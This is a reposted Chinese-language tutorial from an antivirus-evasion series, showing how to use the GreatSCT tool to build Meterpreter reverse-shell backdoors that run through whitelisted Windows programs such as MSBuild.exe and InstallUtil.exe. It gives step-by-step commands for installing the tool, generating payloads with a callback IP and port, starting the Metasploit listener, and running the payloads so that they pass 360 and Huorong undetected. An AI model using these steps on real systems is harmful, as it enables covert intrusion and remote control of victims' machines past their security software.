org已经备案的网站,广东企业宣传片制作公司,免费的个人简历模板excel,wordpress初级教程转载#xff1a;https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ
免杀能力一览表 几点说明#xff1a;
1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。
2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/mete…转载https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ
免杀能力一览表 几点说明
1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。
2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。
一、GreatSCT介绍
GreatSCT可以基于Metasploit、自定义shellcode、powershell等生成payload然后可利用多种白名单程序进行加载从而达到免杀的目的。
支持的6种白名单方式:
1、Installutil.exe安装程序工具是一款命令行工具允许您通过运行安装程序组件来安装和卸载特定程序集中的服务器资源。
2、Msbuild.exeMicrosoft Build Engine是一个用于构建应用程序的平台。这个引擎也称为MSBuild。
3、Mshta.exeMshta.exe运行Microsoft HTML应用程序Windows OS实用程序负责运行HTAHTML应用程序文件。我们可以运行JavaScript或Visual的HTML文件。
4、Regasm.exe程序集注册工具读取程序集内的元数据并将必要的记录添加到注册表中,从而允许COM客户端透明地创建.NET框架类。
5、Regsvcs.exeRegSvcs表示Microsoft .NET远程注册表服务它以.NET服务安装著称。
6、Regsvr32.exeRegsvr32是一个命令行实用程序用于在Windows注册表中注册和取消注册OLE控件例如DLL和ActiveX控件。
二、安装GreatSCT
GreatSCT依赖于python3环境python2无法正常执行而且操作系统建议kali或者parrot其他系统还需要额外安装msf。
1、从github上Clone到本地 git clone https://github.com/GreatSCT/GreatSCT.git2、执行安装程序 cd GreatSCT/setupsudo ./setup.sh -c3、注意事项
看安装命令比较简单但其实里面安装的依赖程序还是挺多的。
比如其中有行安装代码是这样的 apt-get -y -qq install mono-complete mono-mcs unzip wget git ruby p7zip wine wine32 wine64 winbind看起来也没什么问题但装着装着可能就各种异常了。
如果安装时出现异常可以根据setup.sh内容自己逐项的去安装解决。
三、GreatSCT使用说明
使用命令python3 GreatSCT.py -h可以查看帮助说明 比较常用的几个参数:
GreatSCT Options:--update 更新GreatSCTk.--version 显示版本.--list-tools 列出GreatSCT所有的可用工具(模块),不过目前只有Bypass这一个模块-t Bypass 指定待使用的模块因为只有bypass所以就只能用-t Bypass了Callback Settings:--ip IP, --domain IP 指定回连的IP--port Port 指定回连的端口[*] Payload Settings:--list-payloads 列出所有的可用payload--generate-awl 利用所有模块批量免杀后门Great Scott Options:-c [OPTION1value OPTION2value [OPTION1value OPTION2value ...]]自定义payload选项-o OUTPUT NAME 指定生产后门文件的名字-p [PAYLOAD] 指定后门使用的payload--clean 清除输出文件夹--msfoptions [OPTIONvalue [OPTIONvalue ...]]指定msf选项--msfvenom [windows/meterpreter/reverse_tcp]利用Msfvenom生成shellcode其中–list-payloads的使用方法是python3 GreatSCT.py -t Bypass --list-payloads,可使用的26个payload。
看名称也很容易判断出各payload的作用主要是生成相应shellcode后使用installutil、msbuild、regasm、regsvcs等白名单程序来执行。和专题19中的工具nps_payload原理差不多只不过GreatSCT支持的白名单更多一些。 其中–generate-awl用法是python3 GreatSCT.py -t Bypass --generate-awl --ip 10.211.55.2 --port 3333使用payload批量生成免杀后门。
四、利用GreatSCT生成后门
4.1 交互式生成单个后门
GreatSCT提供了傻瓜式的交互模式生成后门 执行python3 GreatSCT.py 输入list可查看所有支持的工具模块只有一个 输入use 1或者use Bypass可使用该模块,并进入到payload选择中 输入list可查看所有模块 输入use 序号可选择使用对应payload我这里就选msbuild/meterpreter/rev_https.py了也就是use 8。进入参数设置。 一般只需要设置LHOST和LPORT就可以 输入generate后开始生成后门文件还会提示输入文件名不输入的话会默认为payload 启动metasploit可直接执行msfconsole -r /usr/share/greatsct-output/handlers/payload.rc 把/usr/share/greatsct-output/source/payload.xml文件拷贝到测试机上。
使用命令C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe payload.xml来进行加载。 可正常上线 打开杀软动态静态都没有提示
4.2 参数式生成单个后门
GreatSCT可以使用参数自动生成shellcode比较方便快捷。
以基于installutil的shellcode为例进行测试。 python3 GreatSCT.py --ip 10.211.55.2 --port 3333 -t Bypass -p installutil/meterpreter/rev_https.py生成文件成功 生成的payload.exe不能直接执行需要使用InstallUtil.exe来执行。
执行命令C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile /LogToConsolefalse payload.exe 可免杀正常上线。
4.3 批量生成后门
还可以使用命令python3 GreatSCT.py -t Bypass --generate-awl --ip 10.211.55.2 --port 3333来批量生成后门文件这样每个payload对应一个后门。
执行后会在文件夹中生成类似的下列文件自己可以逐一测试。
五、GreatSCT小结
GreatSCT由于是基于白名单的文件加载所以生成的.xml或.dll之类免杀效果比较好而.exe文件免杀效果就比较一般了所以可以根据具体情境去结合使用。GreatSCT提供了6中白名单方式综合免杀效果还算可以。
六、参考资料
官方githubhttps://github.com/GreatSCT/GreatSCT
GreatSct -应用程序白名单bypass工具https://www.cnblogs.com/backlion/p/10493919.html
